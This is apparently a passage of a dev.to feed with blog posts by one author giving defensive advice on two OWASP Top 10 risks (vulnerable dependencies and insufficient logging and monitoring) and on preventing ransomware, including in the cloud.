      &lt;a href="https://twitter.com/intent/retweet?tweet_id=1470504212031279111" class="ltag__twitter-tweet__actions__button"&gt;
        &lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--k6dcrOn8--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev.to/assets/twitter-retweet-action-632c83532a4e7de573c5c08dbb090ee18b348b13e2793175fea914827bc42046.svg" alt="Twitter retweet action"&gt;
      &lt;/a&gt;
      &lt;a href="https://twitter.com/intent/like?tweet_id=1470504212031279111" class="ltag__twitter-tweet__actions__button"&gt;
        &lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--SRQc9lOp--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev.to/assets/twitter-like-action-1ea89f4b87c7d37465b0eb78d51fcb7fe6c03a089805d7ea014ba71365be5171.svg" alt="Twitter like action"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/blockquote&gt;


&lt;p&gt;&lt;a href="https://dev.to/leading-edje"&gt;&lt;br&gt;
  &lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--SfUhPiEd--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/5uo60qforg9yqdpgzncq.png" alt="Smart EDJE Image" width="800" height="280"&gt;&lt;br&gt;
&lt;/a&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>java</category>
    </item>
    <item>
      <title>OWASP Top 10 for Developers: Using Components with Known Vulnerabilities</title>
      <dc:creator>Andy Kofod</dc:creator>
      <pubDate>Wed, 15 Sep 2021 05:40:31 +0000</pubDate>
      <link>https://forem.com/leading-edje/owasp-top-10-for-developers-using-components-with-known-vulnerabilities-13j1</link>
      <guid>https://forem.com/leading-edje/owasp-top-10-for-developers-using-components-with-known-vulnerabilities-13j1</guid>
      <description>&lt;p&gt;The OWASP Top 10 is an open-source project that lists the ten most critical security risks to web applications. By addressing these issues, an organization can greatly improve the security of their software applications. Unfortunately, many developers aren't familiar with the list, or don't have a thorough understanding of the vulnerabilities and how to prevent them. In this series, I'm going to break down each of the vulnerabilities on the list, explain what each one is, how to identify it in your projects, and how to prevent it.&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;a href="https://owasp.org/www-project-top-ten/2017/A9_2017-Using_Components_with_Known_Vulnerabilities" rel="noopener noreferrer"&gt;Using Components with Known Vulnerabilities&lt;/a&gt;
&lt;/h2&gt;

&lt;h3&gt;
  
  
  What is it?
&lt;/h3&gt;

&lt;p&gt;This is one of the most prevalent issues among the OWASP Top 10. The growing reliance on third-party components creates a risk if dependencies aren't kept up to date. There are numerous tools, such as the &lt;a href="https://www.metasploit.com/" rel="noopener noreferrer"&gt;Metasploit Framework&lt;/a&gt;, available to attackers, that allow them to easily identify and exploit known vulnerabilities in applications and operating systems. In many cases, a patch has been released for these vulnerable applications, but the victim organization has been slow to update their dependencies. Additionally, developers may not thoroughly understand the nested dependencies of all of the libraries that are being used in an application.&lt;/p&gt;

&lt;h3&gt;
  
  
  How can you identify it?
&lt;/h3&gt;

&lt;p&gt;Identifying this type of vulnerability requires a thorough review of all frameworks and dependencies used in an application to check for known vulnerabilities listed in the &lt;a href="https://cve.mitre.org/" rel="noopener noreferrer"&gt;CVE database&lt;/a&gt;. Additionally, applications need to be continuously monitored for newly reported vulnerabilities. This can be an extremely time consuming process, so it's safe to assume that, if your organization doesn't have a defined process for regularly updating your dependencies, then you probably have at least some vulnerabilities in your application.&lt;/p&gt;

&lt;h3&gt;
  
  
  How can you prevent it?
&lt;/h3&gt;

&lt;p&gt;In order to prevent this issue, your organization needs to implement regular checks of your dependencies against the CVE database for known vulnerabilities, as well as establishing a process for keeping all dependencies up-to-date. Fortunately, much of this can be automated using vulnerability scanning tools, such as the &lt;a href="https://owasp.org/www-project-dependency-check/" rel="noopener noreferrer"&gt;OWASP Dependency Check&lt;/a&gt;, &lt;a href="https://retirejs.github.io/retire.js/" rel="noopener noreferrer"&gt;RetireJS&lt;/a&gt;, or &lt;a href="https://brakemanscanner.org/" rel="noopener noreferrer"&gt;Brakeman&lt;/a&gt;. Additional tools, such as &lt;a href="https://www.whitesourcesoftware.com/free-developer-tools/renovate/" rel="noopener noreferrer"&gt;WhiteSource's Renovate&lt;/a&gt;, provide a complete dependency management solution by automatically updating any found vulnerabilities. In addition to keeping dependencies updated, it's important to remove any dependencies that are no longer being used.&lt;/p&gt;

&lt;h3&gt;
  
  
  References
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://owasp.org/www-project-top-ten/2017/A9_2017-Using_Components_with_Known_Vulnerabilities" rel="noopener noreferrer"&gt;OWASP Top 10 Project: 9. Using Components with Known Vulnerabilities&lt;/a&gt;&lt;br&gt;
&lt;a href="https://owasp.org/www-project-dependency-check/" rel="noopener noreferrer"&gt;OWASP Dependency Check Project&lt;/a&gt;&lt;br&gt;
&lt;a href="https://retirejs.github.io/retire.js/" rel="noopener noreferrer"&gt;RetireJS&lt;/a&gt;&lt;br&gt;
&lt;a href="https://brakemanscanner.org/" rel="noopener noreferrer"&gt;Brakeman&lt;/a&gt;&lt;br&gt;
&lt;a href="https://www.whitesourcesoftware.com/free-developer-tools/renovate/" rel="noopener noreferrer"&gt;WhiteSource Renovate&lt;/a&gt;&lt;br&gt;
&lt;a href="https://cve.mitre.org/" rel="noopener noreferrer"&gt;CVE Database&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://dev.to/leading-edje"&gt;&lt;br&gt;
  &lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F5uo60qforg9yqdpgzncq.png" alt="Smart EDJE Image"&gt;&lt;br&gt;
&lt;/a&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>security</category>
    </item>
    <item>
      <title>Ransomware in the Cloud: What are the risks and how do you avoid them?</title>
      <dc:creator>Andy Kofod</dc:creator>
      <pubDate>Wed, 15 Sep 2021 04:30:27 +0000</pubDate>
      <link>https://forem.com/leading-edje/ransomware-in-the-cloud-what-are-the-risks-and-how-do-you-avoid-them-4jn8</link>
      <guid>https://forem.com/leading-edje/ransomware-in-the-cloud-what-are-the-risks-and-how-do-you-avoid-them-4jn8</guid>
      <description>&lt;p&gt;Ransomware is the number one cybersecurity threat facing organizations today. According to the annual &lt;a href="https://www.sophos.com/en-us/press-office/press-releases/2021/04/ransomware-recovery-cost-reaches-nearly-dollar-2-million-more-than-doubling-in-a-year.aspx"&gt;Sophos "State of Ransomeware" report&lt;/a&gt; the average total cost of recovery from a ransomware attack more than doubled in 2021 to $1.85 million, up from $761,106 in 2020. I covered some of the &lt;a href="https://dev.to/leading-edje/ransomware-what-is-it-and-how-do-you-avoid-becoming-a-victim-5glc"&gt;basics of ransomware&lt;/a&gt; in a previous article, but what if your organization has moved, fully or partially, to the cloud? Are you safe from ransomware?&lt;/p&gt;

&lt;p&gt;The short answer is no. Just because you've transitioned to the cloud, doesn't mean you can relax on your cybersecurity efforts. All of the major cloud service providers operate on a "shared responsibility" security model. This means that they will handle the security of the infrastructure they provide, but you are responsible for ensuring the security of your apps and data.&lt;/p&gt;

&lt;p&gt;That said, there are plenty of benefits to hosting your data and apps in the cloud. As mentioned, your cloud provider takes on the responsibility for securing the infrastructure that hosts your apps and data. No matter what level of security your organization requires, you have the comfort of knowing that the infrastructure you're using is architected to the specifications of the cloud provider's most security-sensitive clients. In addition, cloud providers generally offer a number of tools and services that can make security easier from your side. Services like identity and access management, monitoring, logging, auditing, data encryption, and key management can be easily integrated into your solutions. While these tools can greatly simplify your cybersecurity initiatives, ensuring that they're used and configured properly is up to you.&lt;/p&gt;

&lt;h2&gt;
  
  
  Ransomware Threats in the Cloud
&lt;/h2&gt;

&lt;p&gt;Servers hosted in the cloud are not inherently any safer from ransomware than they would be if they were running on premises. And the same precautions should be taken for either. However, there are some specific threats to your cloud services that you should be aware of.&lt;/p&gt;

&lt;h3&gt;
  
  
  Document Storage
&lt;/h3&gt;

&lt;p&gt;Many organizations treat cloud document storage services as a form of data backup. This kind of makes sense, right? If you upload a document from your computer to the cloud, then if anything happens to the local version, you can just download the cloud version and you're back up and running. Many of these services include syncing your documents as a feature. Anytime you make a change locally, it's automatically uploaded to the cloud, and you don't need to worry about keeping it up to date. The problem is, if your local machine becomes infected with ransomware, when those synced files are encrypted, the encrypted versions will be automatically synced to the cloud. Now your backups are corrupted as well. No matter which document storage solution you use (Dropbox, OneDrive, Google Drive, etc.), if your files are automatically synced, your vulnerable to this type of attack. Additionally, if the user whose machine is compromised has access to other shared documents in the cloud, those files could also be encrypted by the attacker.&lt;/p&gt;

&lt;p&gt;Using versioning is one way to help prevent data loss from this type of attack, and most storage providers have some form of versioning available. The number of previous versions and how long they are maintained will vary from one vendor to another, and you may need to configure this option in your settings. While versioning can help, it's also best to make regular backups of your cloud files and store them in a separate location, such as an AWS S3 bucket. This way, if your files do become encrypted, you still have a way to restore them.&lt;/p&gt;

&lt;h3&gt;
  
  
  RansomCloud
&lt;/h3&gt;

&lt;p&gt;RansomCloud is a new strain of ransomware that targets cloud email services. The attacker tricks a user into clicking on a link in an email and allowing access to their cloud account. Once the user accepts, the attacker has full access to their account. To see a RansomCloud attack in real-time, check out this &lt;a href="https://www.datto.com/resources/ransomcloud-demo"&gt;demonstration by Kevin Mitnick&lt;/a&gt;, where he shows just how easy it is to fall victim to this type of attack.&lt;/p&gt;

&lt;p&gt;In order to mitigate the risk of a RansomCloud attack, organizations should regularly backup all cloud email data to a secure location, allowing for speedy recovery. Additionally, advanced antimalware and spam detection should be used to scan for and filter out potentially dangerous emails. Finally, ensure that all employees are trained on the dangers of ransomware, and how to spot and report phishing emails.&lt;/p&gt;

&lt;h3&gt;
  
  
  Malicious Apps and Extensions
&lt;/h3&gt;

&lt;p&gt;With the rapid shift to remote work fueled by the COVID-19 pandemic, IT departments have been forced to find solutions to keep their workers connected and productive. This has caused organizations to drastically increase their reliance on third-party apps and services. While most apps don't cause any security concerns, there are a growing number of malicious apps and browser extensions being spread thorough the app stores. During installation, these apps will often ask the user to grant permissions to manage data or to access a user's account. Once granted, the attacker has the access they need to begin encrypting files.&lt;/p&gt;

&lt;p&gt;While limiting what apps can be installed on organization hardware via admin controls can help limit the exposure to malicious apps, the rise in the use of cloud services that can be accessed from multiple devices dramatically increases the risks of account takeovers due to users installing malicious apps from the Android or iOS app stores. This is why it's essential that organizations educate employees about the dangers of malicious software, and how to avoid these types of attacks.&lt;/p&gt;

&lt;h2&gt;
  
  
  Protecting Your Cloud Environments
&lt;/h2&gt;

&lt;p&gt;These are just a few of the attack vectors currently targeting cloud services, and new ones are discovered all the time. So, how do you protect your organization's cloud environment?&lt;/p&gt;

&lt;p&gt;All of the major cloud providers (&lt;a href="https://aws.amazon.com/it/blogs/security/ransomware-mitigation-top-5-protections-and-recovery-preparation-actions/"&gt;AWS&lt;/a&gt;, &lt;a href="https://cloud.google.com/blog/products/identity-security/5-pillars-of-protection-to-prevent-ransomware-attacks"&gt;Google Cloud&lt;/a&gt;, and &lt;a href="https://docs.microsoft.com/en-us/security/compass/protect-against-ransomware"&gt;Azure&lt;/a&gt;), have recently released guidance to help organizations follow best practices in securing their cloud environments. Some of the key takeaways from these documents are:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Identify your sensitive data and evaluate the primary cybersecurity risks your organization faces.&lt;/li&gt;
&lt;li&gt;Implement a robust disaster recovery plan, utilizing your providers backup and recovery solutions.&lt;/li&gt;
&lt;li&gt;Encrypt all sensitive data, both in transit and at rest.&lt;/li&gt;
&lt;li&gt;Limit attacker access by implementing strict user access policies.&lt;/li&gt;
&lt;li&gt;Keep all applications and operating systems up-to-date, and employ automated tools to regularly apply patches and keep dependencies updated.&lt;/li&gt;
&lt;li&gt;Follow a defined security standard, either a regulatory or compliance standard, such as PCI DSS, or a standard provided by your cloud provider, such as the AWS Well-Architected Framework.&lt;/li&gt;
&lt;li&gt;Make use of monitoring and automated alerting tools.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;While ransomware attacks will continue to evolve, implementing cybersecurity best practices in your cloud environment will go a long way in protecting your organization from becoming a victim of ransomware. For additional information on how to protect your organization see the recent &lt;a href="https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.1800-25.pdf"&gt;NIST special publication&lt;/a&gt; focused on protecting against ransomware attacks. &lt;/p&gt;

&lt;p&gt;&lt;a href="https://dev.to/leading-edje"&gt;&lt;br&gt;
  &lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--SfUhPiEd--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/5uo60qforg9yqdpgzncq.png" alt="Smart EDJE Image"&gt;&lt;br&gt;
&lt;/a&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>cloud</category>
    </item>
    <item>
      <title>Ransomware: What is it and how do you avoid becoming a victim?</title>
      <dc:creator>Andy Kofod</dc:creator>
      <pubDate>Fri, 11 Jun 2021 21:48:41 +0000</pubDate>
      <link>https://forem.com/leading-edje/ransomware-what-is-it-and-how-do-you-avoid-becoming-a-victim-5glc</link>
      <guid>https://forem.com/leading-edje/ransomware-what-is-it-and-how-do-you-avoid-becoming-a-victim-5glc</guid>
      <description>&lt;p&gt;The landscape of malware has shifted dramatically in the past decade or so. Computer viruses that were developed to wreak havoc on companies and individuals by self-replicating, and slowing down or wiping out systems have evolved into big business. Not to diminish the severity of these types of malware, some of them caused billions of dollars in damage. However, the cost of these early viruses usually came in the form of lost revenue due to downtime while the systems were repaired, along with the hit to a company's reputation and customer confidence. Many also resulted in stolen data, leading to compromised credentials and identity theft. But more and more, attackers are shifting to a different type of malware for their attacks. Ransomware isn't a new type of virus. The first known variant was released in 1989. But it's quickly becoming the tool of choice for criminal organizations. The days of hackers being satisfied with simply &lt;b&gt;costing&lt;/b&gt; a company large amounts of money are gone. The hackers' focus has shifted to &lt;b&gt;making&lt;/b&gt; money from their attacks.&lt;/p&gt;

&lt;p&gt;During the Nashville Cyber Security Summit in May, the morning keynote was a briefing from the FBI on the current landscape of cyber threats. It was no surprise to learn that ransomware is one of the most imminent threats they're tracking right now. In the past decade ransomware attacks have increased dramatically, and have become a serious threat to businesses, healthcare, and even to national security. The most notable recent attack, on the Colonial Pipeline, for example, caused a major bottle-neck in the gasoline supply chain that resulted in higher gas prices, and fuel shortages all along the east coast. While this most recent attack was widely publicized by the media, it's far from an isolated incident. According to the &lt;a href="https://blog.emsisoft.com/en/37314/the-state-of-ransomware-in-the-us-report-and-statistics-2020/"&gt;Emsisoft State of Ransomware Report&lt;/a&gt; at least 2,354 government, healthcare and educational institutions were hit with ransomware attacks in 2020. The report goes on to state,&lt;/p&gt;

&lt;p&gt;&lt;em&gt;"The attacks caused significant, and sometimes life-threatening, disruption: ambulances carrying emergency patients had to be redirected, cancer treatments were delayed, lab test results were inaccessible, hospital employees were furloughed and 911 services were interrupted."&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;And it's no wonder that we're seeing these attacks increase in frequency. It's an extremely lucrative business model for criminal organizations. A &lt;a href="https://securityandtechnology.org/wp-content/uploads/2021/04/IST-Ransomware-Task-Force-Report.pdf"&gt;report released by the IST's Ransomware Task Force&lt;/a&gt; reports that ransomware victims paid a combined $350 million dollars to hackers in 2020, with an average payment of over $312,000.&lt;/p&gt;

&lt;p&gt;But the fallout from ransomware attacks goes beyond the disruptions to public services and healthcare, and the serious threats posed to critical infrastructure. The proceeds paid to these criminal organizations are often used to fund other criminal activities like drug smuggling, human trafficking and terrorism. While law enforcement agencies are stepping up their efforts to combat ransomware, it's important that businesses do everything they can to harden their systems and prevent their organization from becoming a victim.&lt;/p&gt;

&lt;h2&gt;
  
  
  What is ransomware?
&lt;/h2&gt;

&lt;p&gt;At it's most basic level ransomware is a type of computer virus that uses encryption to lock the files on a computer system. The user is then instructed, usually through a file placed on the system by the virus, to pay a specified amount of money to the attacker in order to have their files decrypted. The most common form of payment requested is through Bitcoin, due to the anonymity it provides. (Although a &lt;a href="https://www.justice.gov/opa/pr/department-justice-seizes-23-million-cryptocurrency-paid-ransomware-extortionists-darkside"&gt;recent operation by the FBI&lt;/a&gt; may give the criminals second thoughts about how secure cryptocurrency really is.) Payment is made based on the promise that the hacker will unlock the encrypted files once the funds have been received.&lt;/p&gt;

&lt;p&gt;The earliest known ransomware, the &lt;a href="https://en.wikipedia.org/wiki/Ransomware#Encrypting_ransomware"&gt;"AIDS Trojan"&lt;/a&gt; used a fairly simple encryption algorithm, and it wasn't long before a tool was developed that could decrypt infected systems. Modern ransomware variants have evolved a lot since the first generation. Using the latest encryption algorithms makes it nearly impossible for a victim to unlock the files themselves, without the private key. Additionally, current ransomware variants can do much more than simply encrypt the files on a system. These new variants can open backdoors to the attackers, who can perform reconnaissance activities to determine which files are most valuable to an organization. They may also steal any credentials found on the system and exfiltrate data to the attackers. Some variants will lay dormant for a significant period of time, ensuring that any backups that the organization may use to restore their system are also infected.&lt;/p&gt;

&lt;p&gt;Just as the viruses have evolved, so have the tactics used by the attackers. Early mass attacks on individual users through SPAM phishing campaigns have given way to more targeted attacks on large organizations. The theory being that these types of targets have the ability to pay higher ransoms than individuals for the same level of effort on the attackers' part, and they're more likely to pay the ransom due to the nature of the data on their systems. There's also been a large increase in the use of extortion, with groups threatening to release a company's sensitive data if payment isn't made.&lt;/p&gt;

&lt;h2&gt;
  
  
  Should victims pay the ransom?
&lt;/h2&gt;

&lt;p&gt;This is an extremely difficult question to answer. The &lt;a href="https://securityandtechnology.org/wp-content/uploads/2021/04/IST-Ransomware-Task-Force-Report.pdf"&gt;Ransomware Task Force report&lt;/a&gt; dedicates an entire section to the topic, and whether or not the government should ban organizations from paying ransom. On one hand, this could potentially decrease the profitability of ransomware attacks, as well as keeping money that could be used for other criminal activity out of the attackers' bank accounts. On the other hand, this approach could lead attackers to target more critical systems, and would almost certainly result in the sale or public release of an organization's data. In the end, the Ransomware Task Force was not able to reach a consensus on whether payments should be prohibited or not, but they did state that they should be discouraged as much as possible.&lt;/p&gt;

&lt;p&gt;Whether a victim should pay the ransom or not has to be considered on a case-by-case basis. Organizations that don't have a good backup and recovery program may have no choice but to pay the attackers, or lose all of their data permanently. Another consideration is the type of data that is stored on the system, and what effect the public release of that data would have on the organization and it's customers. Unfortunately, paying the ransom doesn't necessarily guarantee that your data will be unlocked. According to the &lt;a href="https://news.sophos.com/en-us/2021/04/27/the-state-of-ransomware-2021/"&gt;Sophos State of Ransomware 2021 report&lt;/a&gt;, only 8% of victims who payed a ransom actually got all of their files back, with an average of about 65% of files being recovered for most victims. In addition, even if your files are recovered, there's no guarantee that the virus was completely removed from your system, or that the attackers won't sell your data on the dark web anyway. You are dealing with criminals, after all. What's more, paying a ransom may label your organization as a "soft target" which will encourage future attacks, either by the same group, or by others. When it comes to ransomware, prevention is the best cure.&lt;/p&gt;

&lt;h2&gt;
  
  
  How do you avoid becoming a victim of ransomware?
&lt;/h2&gt;

&lt;p&gt;In order to avoid becoming a victim of ransomware, organizations need to focus on two primary areas: hardening your systems and recovery planning. Hardening your systems against ransomware is no different than protecting it from other types of malware and intrusions. By following industry best practices, you can greatly reduce your risk of becoming a victim. Recovery planning requires having a plan in place that can get your organization back up and running quickly in the event of a successful attack. With those things in mind, here are a few suggestions to help keep your organization safe:&lt;/p&gt;

&lt;h3&gt;
  
  
  1. Educate your users
&lt;/h3&gt;

&lt;p&gt;One of the most important steps in securing your system is making sure that every user in your organization understands how seriously you take security, and that it is part of their job responsibilities to understand common risks and how to avoid them. Users should be trained on topics such as how to avoid phishing attempts and how to identify and report suspicious activity, both on their workstations and in their physical environment. Good security education is even more important for your technical staff. Developers, DBAs and System Admins should all receive regular security training. But it's also important to ensure that trainings are tailored for specific user groups. Forcing your developers to complete an online phishing course every year doesn't help anyone. It costs the organization money and time, and your developers will become jaded to security in general. Instead, provide your more technical users with advanced training on topics like database security or secure coding practices. If every user in your organization can tell how seriously upper management takes security, they will take it seriously as well. For additional tips on fostering a culture of security in your organization, &lt;a href="https://dev.to/leading-edje/cultivating-a-security-focused-development-team-4g1g"&gt;see my previous article on the subject&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  2. Require multi-factor authentication
&lt;/h3&gt;

&lt;p&gt;Requiring your users to login to your systems with multi-factor authentication goes a long way in preventing credential attacks. Even if a user's password has been compromised, requiring the use of an MFA app will prevent access by anyone who doesn't have the device needed to authenticate. Assuming your user didn't have their device stolen by the same person that accessed their credentials (not out of the question, but unlikely), you can be fairly certain that any login came from an authorized user.&lt;/p&gt;

&lt;h3&gt;
  
  
  3. Enforce strong passwords
&lt;/h3&gt;

&lt;p&gt;Your password policy should ensure that any brute force password attacks on your systems will not be successful. You can reference the &lt;a href="https://pages.nist.gov/800-63-3/sp800-63b.html"&gt;NIST Digital Identity Guidelines&lt;/a&gt; to ensure you're following best practices in defining your password policies. If possible, avoid user generated passwords all together by utilizing a password manager, with strong, randomly generated passwords, and a unique password for each application a user will log into.&lt;/p&gt;

&lt;h3&gt;
  
  
  4. Implement "Least Privilege" principles across your systems
&lt;/h3&gt;

&lt;p&gt;The principle of least privilege ensures that users only have access to the resources they need to do their job, and nothing more. Cases where a user needs temporary access should require approval, and access should be removed as soon as the task is complete. The same is true for your internal applications. Each application should only be able to communicate with the systems it requires. All other traffic should be restricted, and any unnecessary protocols should be disabled.&lt;/p&gt;

&lt;h3&gt;
  
  
  5. Keep your software up to date
&lt;/h3&gt;

&lt;p&gt;This is one of the biggest things you can do to prevent attacks, and unfortunately, it's one of the most often neglected. Attacks using a brand new exploit are fairly rare. The vast majority exploit known vulnerabilities in software packages or operating systems. In many successful attacks, a patch had already been released, but the victim hadn't updated their system yet. Ensure that all of your user's workstations receive automatic updates, and implement a process for updating any other machines regularly. Make certain that you are keeping up with the latest additions to the &lt;a href="https://nvd.nist.gov/"&gt;NIST National Vulnerability Database&lt;/a&gt; and applying patches to any vulnerable software immediately. If your organization develops software, make sure all third-party dependencies are kept up to date. I've seen too many organizations push off CVE warnings from their static scanners because it conflicts with another dependency and would require significant refactoring. These organizations are willingly opening themselves up to become ransomware victims, and the fact that they haven't yet, is pure luck. In my opinion, keeping your dependencies up-to-date should take precedence over all new feature work.&lt;/p&gt;

&lt;h3&gt;
  
  
  6. Have a good backup process in place
&lt;/h3&gt;

&lt;p&gt;Make sure that you're regularly backing up all of your data, and that it's stored in a safe location, not connected to your network. Your backups should be tested regularly to ensure that they haven't been corrupted, and you should practice deploying your backups on a regular basis.&lt;/p&gt;

&lt;h3&gt;
  
  
  7. Encrypt data at rest
&lt;/h3&gt;

&lt;p&gt;Encrypting your own data won't prevent a ransomware attack, but it may help alleviate extortion threats in the event of a successful attack. By ensuring that your data is encrypted, you can be fairly confident that the attackers don't have any sensitive data that they can release or sell. This approach may come with some tradeoffs, however. Encrypting data at rest means it will need to be decrypted before it can be used by your organization. In some cases this may not be an issue, but when performance and speed are a high priority, it may not make sense, depending on the data being stored. If the data is highly sensitive, such as financial or healthcare information, the performance hit may be worth it.&lt;/p&gt;

&lt;p&gt;Unfortunately, there's no silver bullet to guarantee you'll never be the victim of a ransomware attack, but implementing these suggestions will go a long way in shoring up your defenses.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://dev.to/leading-edje"&gt;&lt;br&gt;
  &lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--SfUhPiEd--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/5uo60qforg9yqdpgzncq.png" alt="Smart EDJE Image"&gt;&lt;br&gt;
&lt;/a&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>security</category>
    </item>
    <item>
      <title>OWASP Top 10 for Developers: Insufficient Logging and Monitoring</title>
      <dc:creator>Andy Kofod</dc:creator>
      <pubDate>Mon, 15 Mar 2021 07:17:01 +0000</pubDate>
      <link>https://forem.com/leading-edje/owasp-top-10-for-developers-insufficient-logging-and-monitoring-41oa</link>
      <guid>https://forem.com/leading-edje/owasp-top-10-for-developers-insufficient-logging-and-monitoring-41oa</guid>
      <description>&lt;p&gt;The OWASP Top 10 is an open-source project that lists the ten most critical security risks to web applications. By addressing these issues, an organization can greatly improve the security of their software applications. Unfortunately, many developers aren't familiar with the list, or don't have a thorough understanding of the vulnerabilities and how to prevent them. In this series, I'm going to break down each of the vulnerabilities on the list, explain what each one is, how to identify it in your projects, and how to prevent it.&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;a href="https://owasp.org/www-project-top-ten/2017/A10_2017-Insufficient_Logging%2526Monitoring"&gt;Insufficient Logging and Monitoring&lt;/a&gt;
&lt;/h2&gt;

&lt;h3&gt;
  
  
  What is it?
&lt;/h3&gt;

&lt;p&gt;This vulnerability stems from an application not logging important events as they take place. A lack of logging within an application, or not properly monitoring and responding to application logs, can allow an attack to continue when it could have been caught and terminated had proper controls been in place. It also makes it difficult to reconstruct the events of an attack so that vulnerabilities can be identified and addressed. Most applications do some level of logging, but it's important to understand what should be logged, where those logs should be stored, how they should be monitored, and how the security team should respond to suspected attacks.&lt;/p&gt;

&lt;h3&gt;
  
  
  How can you identify it?
&lt;/h3&gt;

&lt;p&gt;Identifying this type of vulnerability isn't as easy as looking for a specific line in the code. This vulnerability actually occurs due to a lack of code. Because of this, it may be difficult to understand where your application stands with regards to your security logging.&lt;/p&gt;

&lt;p&gt;The first step is to determine what logging is currently present within your application. There may be other purposes for your logging activity, such as debugging or for data analytics. Identify where logging is taking place within your application and what it's being used for.&lt;/p&gt;

&lt;p&gt;Next, you'll need to determine where the data is being logged. Is there a log file stored on the same machine that's running the application? Is there a central logging system where multiple applications are logging information? Are security logs being stored along side debugging or analytics logs? Is the log data being stored in a cloud service, such as AWS CloudWatch, that monitors your entire account?&lt;/p&gt;

&lt;p&gt;Finally, you need to determine how the logged data is being monitored and acted on. Is the data being fed into an intrusion detection system? Are there rules in place to trigger alerts for suspicious activity? Are there plans in place for responding to these alerts?&lt;/p&gt;

&lt;p&gt;If you've determined that you are logging security data, you will need to ensure that the data being logged is sufficient to identify an attempted attack. This can be difficult if you don't have data from a previous attack available to review. If you're not sure if you're logging the correct data, OWASP suggests that reviewing the log files following a penetration test is a good way to determine how thorough your logging is. The logs should show the tester's scanning and attack attempts, and should provide enough information to determine the actions they took within the system, and the data they were able to access.&lt;/p&gt;

&lt;p&gt;If your application is not logging security data, or the logs don't provide enough data to identify and track an attacker, then you need to add additional logging to your application.&lt;/p&gt;

&lt;h3&gt;
  
  
  How can you prevent it?
&lt;/h3&gt;

&lt;p&gt;Reducing this risk is a matter of ensuring that you are collecting data related to security functions within your application, that the data collected is monitored for potential attacks, and that proper alerting is in place. Here are some guidelines for implementing proper logging:&lt;/p&gt;

&lt;h4&gt;
  
  
  1. Identify what events and data should be logged.
&lt;/h4&gt;

&lt;p&gt;First, you'll need to determine which events need to be monitored. This will include things like login attempts, login failures, attempts to access restricted pages, input validation failures, modification of application data, etc. Once you've identified the events to be logged, you need to determine what data should be logged with it. You'll want to include a timestamp in all logs, and if you're logging from multiple applications or services, you'll want to ensure that the timestamps are synced across services. You should also log some type of identifying information, such as the IP address or the user id. You may also want to include a severity level based on the type of activity being logged. For example, a successful login may be logged as a low severity event, where a failed login attempt will be logged as a high severity event. You should avoid storing sensitive data in your log records, such as passwords, credit card numbers, or social security numbers, etc. Additionally, log data should be considered untrusted, and should be properly sanitized to prevent log injections or log forging. This is by no means an exhaustive list. The events that need to be logged, and the data recorded, will be determined by your organization's specific needs. Whatever data you choose to log, make sure it's in a common format that can be parsed by monitoring tools.&lt;/p&gt;

&lt;h4&gt;
  
  
  2. Determine where log data will be stored.
&lt;/h4&gt;

&lt;p&gt;If possible security logs should be sent to a central location separate from the device running the application. If the application is deployed in a cloud environment, use the cloud provider's logging services. In either case, the log storage needs to have strict security controls in place to prevent tampering with or deleting log records. They should also be stored in a manner that allows them to easily be digested by a monitoring tool. You'll also need to determine a retention policy for your log data. The amount of time logs are kept may be determined by law, if you're in a regulated industry, or it may be a matter of corporate policy. Either way, the retention period should be sufficient to allow forensic analysis of the records should an attack take place.&lt;/p&gt;

&lt;h4&gt;
  
  
  3. Determine how logs will be monitored.
&lt;/h4&gt;

&lt;p&gt;Once you've decided which events to log, and where they'll be stored, you have to decide how these logs will be monitored. There are numerous third-party and open-source options available for log monitoring. If you're using a cloud provider, their logging service will most likely have built-in monitoring and alerting available. Depending on the monitoring tool being used, there may be automated actions that can be configured to help stop attacks when suspicious activity is detected. If you're using one of these tools, you'll need to determine the thresholds that should be set, and the actions that should be taken, ie. invalidating session tokens or locking a user's account.&lt;/p&gt;

&lt;h4&gt;
  
  
  4. Set up alerts for suspicious activity and respond appropriately.
&lt;/h4&gt;

&lt;p&gt;While logs are valuable for determining what happened in the aftermath of an attack, their real value lies in the ability to detect and respond to attacks in real time. Setting up appropriate alerts for specific events allows your security team to monitor activity and take immediate action to protect your data. You'll need to determine which types of events, and at what threshold, these alerts should be triggered. You should also have an incident response plan in place for dealing with security breeches. Guidance for developing an effective incident response plan can be found in the &lt;a href="https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf"&gt;NIST Computer Incident Response Handling Guide&lt;/a&gt;.&lt;/p&gt;

